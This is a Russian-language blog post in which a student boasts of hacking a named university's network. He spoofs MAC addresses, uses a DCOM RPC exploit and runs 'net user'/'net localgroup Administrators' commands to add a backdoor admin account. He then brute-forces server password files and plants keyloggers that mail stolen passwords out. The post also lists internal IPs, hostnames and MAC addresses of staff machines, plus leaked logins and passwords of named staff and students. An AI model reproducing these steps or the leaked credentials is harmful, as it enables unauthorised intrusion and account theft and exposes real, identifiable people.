И так начнем, мы простые студенты или просто люди которые подошли к университету СФ МГПУ,
подключаемся к сети, либо по wi-fi, либо в комп классе просто к ЛВС.
Смотрим настройки подключения командой ipconfig /all.

Узнаем настройки сети. Чтобы подключится к wi-fi, раньше было проше сейчас чуть по сложней. Админы сделали привязку
IP с MAC адрессом сетевой карты, для подключения может понадобится ключ шифрования для точки AirPort Key: 192.168.11.11 да ключ оказался всего лишь адрессом шлюза)))
просканив сеть любым из сканеров, получаем списочек.

192.168.9.1 NB-Vasilev (RJ-45)
192.168.9.2 NB-Серебрякова
192.168.9.3 NB-Chekov
192.168.9.4 NB-Chekov(WiFi)[]
192.168.9.5 NB-Орлова Н.Н.
192.168.9.6 NB-Наумова Е.А.
192.168.9.7 NB-Орлова Н.Н.(WiFi) [00:0E:35:25:3E:72]
192.168.9.8 NB-Meneger
192.168.9.10 NB-Gashimov (WiFi) [00:11:95:CF:E2:41]
192.168.9.11 NB-Gashimov (RJ-45)
192.168.9.12 NB-Zhukotskaya(WiFi)[]
192.168.9.13 NB-Zhukotskaya(RJ-45)
192.168.9.14 NB-Analit (RJ-45)
192.168.9.15 NB-Kornilova (RJ-45)
192.168.9.100 NB-Kozlovskaya (WiFi )
192.168.9.101 NB-Kozlovskaya (RJ-45)
192.168.9.16 NB-Vasilev (RJ-45)
192.168.9.99 NB-Oleg-mobile
192.168.9.88 Tablet_PC (Петрушкин Олег Владимирович)
192.168.9.237 NB-Oleg-home (Мегамозг)

Выбираем себе IP и перебиваем MAC адресс, например утилитой Tech MAC.

1. Пример: Стоит вспомнить что еще на 1курсе, 4года назад, я ломал все тачки с помощью нащумевшей баги
DCOM RPC, стоитт отметить что если и сейчас просканить полностью сеть, то можно и щас поюзать эксплоит.
И так я в локалке нашёл тачку с открытом 139 портом, приминив эксплоит сделал себе аккаунт админа командой
net user shoff denial /addпотом дабавил себя в админы,
net localgroup Administrators shoff /add

2. Пример: берем любой filemaneger подойдет даже winrar находим путь С:\windows\system32\lusrmgr.msc
и банально делаем себе локал админа)))
теперь с конектимся под нашей учетной записью, и дерним конфиги паролей с нашего файл сервера
который находится по адрессу \\server-dc-main\



Мы видем что в системе 371 пользователь, для расшифровки всех понадобится не один день на 2х ядерной тачки.
Мы ограничелись пару часовым брутом и получили половину паролей сервера.
Например такие как Login: DzhadzhaV pass: 123J45 - декан фафкультета Информатики(хочется вспомнить случай когда на паре декан обьеснял очередную шнягу которую он скачал с универа и всех просил подойти к нем, и тут у него тачка вылетает с ошибкой system, или просто камандой shutdown -r я первый раз видел такое лицо в недоумение, таким же образом первый раз падал сервер :-))))
далее есть пороли нашего дизайнера lera pass: cfvfzrktdfz (перевод пороля оказался скромный "самаяклевая")
и еще пару Login: kidman Pass: SVkidman ; Login: Frag Pass: "знак процента"mindtHefu$k ; Login: Oleg Pass: ????????9782307;
Login: bezrodnova Pass: rjirfvsim

Немного побегав по серверу разложим keylloger'ы я использовал KeySpy, и пассы посыпали на мой емаил, что получил

Пасс на мыло Воробьева Паши )))
Resource Name: http://mail.ru/
Resource Type: IE: AutoComplete
User Name : mawlik
Password : 89050189199
==================================================
Пасс на мыло Олега Таранова, жалко олега у него таким же образом увеля я 6ти знак на ICQ )))
Resource Name: http://mail.yandex.ru/login
Resource Type: IE: AutoComplete
User Name : Kujbor
Password : CmDgNpSuk0u8j0b5o8r7:
Еще можно добавит что более 100 аккаунтов было дабыто таким путем )))

Не все сразу, далее будет статья про взлом Web-server www.samara.mgpu.ru
Продолжение следует...